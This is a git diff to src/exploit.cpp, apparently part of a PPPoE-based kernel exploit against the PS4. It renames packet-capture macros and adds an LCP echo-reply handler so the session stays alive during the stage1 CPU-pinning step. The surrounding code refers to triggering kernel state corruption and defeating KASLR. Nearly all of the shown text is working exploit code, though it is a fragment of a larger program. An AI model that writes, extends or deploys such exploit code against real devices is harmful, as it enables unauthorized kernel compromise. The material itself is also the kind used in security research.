diff --git a/src/exploit.cpp b/src/exploit.cpp index c4ba2ec..bff2bcc 100644 --- a/src/exploit.cpp +++ b/src/exploit.cpp @@ -65,8 +65,8 @@ struct Cookie { #define CHECK_RET(value) if((value) != 0) return 1 -#define startCapture(cb) if(dev->startCaptureBlockingMode(cb, nullptr, this->timeout) != 1) { return 1; } -#define startCaptureWithCookie(cb, cookie) if(dev->startCaptureBlockingMode(cb, cookie, this->timeout) != 1) { return 1; } +#define startBlockingCapture(cb) if(dev->startCaptureBlockingMode(cb, nullptr, this->timeout) != 1) { return 1; } +#define startBlockingCaptureWithCookie(cb, cookie) if(dev->startCaptureBlockingMode(cb, cookie, this->timeout) != 1) { return 1; } LcpEchoHandler::LcpEchoHandler(const std::string &iface) { dev = pcpp::PcapLiveDeviceList::getInstance().getPcapLiveDeviceByName(iface); @@ -243,7 +243,7 @@ int Exploit::lcp_negotiation() const { std::cout << "[*] Waiting for LCP configure ACK..." << std::endl; { - startCapture( + startBlockingCapture( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet); auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP); @@ -255,7 +255,7 @@ int Exploit::lcp_negotiation() const { std::cout << "[*] Waiting for LCP configure request..." << std::endl; uint8_t lcp_id = 0; { - startCaptureWithCookie( + startBlockingCaptureWithCookie( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet); auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP); @@ -284,7 +284,7 @@ int Exploit::ipcp_negotiation() const { std::cout << "[*] Waiting for IPCP configure ACK..." << std::endl; { - startCapture( + startBlockingCapture( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet); auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_IPCP); @@ -296,7 +296,7 @@ int Exploit::ipcp_negotiation() const { std::cout << "[*] Waiting for IPCP configure request..." << std::endl; uint8_t ipcp_id = 0; { - startCaptureWithCookie( + startBlockingCaptureWithCookie( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet); auto *lcp_id = (uint8_t *) cookie; @@ -318,7 +318,7 @@ int Exploit::ipcp_negotiation() const { std::cout << "[*] Waiting for IPCP configure request..." << std::endl; Cookie pkt; { - startCaptureWithCookie( + startBlockingCaptureWithCookie( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet, pcpp::PPPoESession); auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_IPCP); @@ -415,7 +415,7 @@ int Exploit::ppp_negotiation(const std::function(Exploit *) std::cout << "[*] Waiting for PADR..." << std::endl; { - startCapture( + startBlockingCapture( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet); auto *layer = PacketBuilder::getPPPoEDiscoveryLayer(parsedPacket, @@ -753,7 +753,7 @@ int Exploit::stage0() { dev->sendPacket(&packet); } - startCapture( + startBlockingCapture( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet, pcpp::ICMPv6); if (!parsedPacket.isPacketOfType(pcpp::ICMPv6)) return false; @@ -778,6 +778,25 @@ int Exploit::stage0() { } int Exploit::stage1() { + /** + * In some devices, the waiting time is not accurate, which may cause the CPU pinning time to be too long, + * and the PS4 unilaterally ends the PPPoE session. + * To avoid this situation, respond to the PPPoE ECHO_REQ here + */ + dev->startCapture([](pcpp::RawPacket* packet, pcpp::PcapLiveDevice* device, void* cookie){ + pcpp::Packet parsedPacket(packet, pcpp::PPPoESession); + auto *pppLayer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP); + if (!pppLayer) return; + if (pppLayer->getLayerPayload()[0] != ECHO_REQ) return; + auto *etherLayer = parsedPacket.getLayerOfType(); + if (!etherLayer) return; + auto &&echoReply = PacketBuilder::lcpEchoReply(etherLayer->getDestMac(), etherLayer->getSourceMac(), + pppLayer->getPPPoEHeader()->sessionId, + pppLayer->getLayerPayload()[1], // id + *(uint32_t *) &pppLayer->getLayerPayload()[4]); // magic number + device->sendPacket(&echoReply); + }, nullptr); + /** * Send invalid packet to trigger a printf in the kernel. For some * reason, this causes scheduling on CPU 0 at some point, which makes @@ -795,6 +814,7 @@ int Exploit::stage1() { } } + dev->stopCapture(); std::cout << "\r[+] Pinning to CPU 0...done" << std::endl; // LCP fails sometimes without the wait @@ -812,7 +832,7 @@ int Exploit::stage1() { } std::cout << "[*] Waiting for LCP configure reject..." << std::endl; - startCapture( + startBlockingCapture( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet); auto *layer = PacketBuilder::getPPPoESessionLayer(parsedPacket, PCPP_PPP_LCP); @@ -847,7 +867,7 @@ int Exploit::stage1() { dev->sendPacket(&packet); } - startCaptureWithCookie( + startBlockingCaptureWithCookie( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet); auto *corrupted = (bool *) cookie; @@ -888,7 +908,7 @@ int Exploit::stage1() { int Exploit::stage2() { std::cout << std::endl << "[*] Defeating KASLR..." << std::endl; - startCaptureWithCookie( + startBlockingCaptureWithCookie( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { pcpp::Packet parsedPacket(packet, pcpp::ICMPv6); if (!parsedPacket.isPacketOfType(pcpp::ICMPv6)) return false; @@ -940,7 +960,7 @@ int Exploit::stage3() { std::cout << "[*] Waiting for stage1 to resume..." << std::endl; int count = 0; - startCaptureWithCookie( + startBlockingCaptureWithCookie( [](pcpp::RawPacket *packet, pcpp::PcapLiveDevice *device, void *cookie) -> bool { auto *count = (int *) cookie; pcpp::Packet parsedPacket(packet);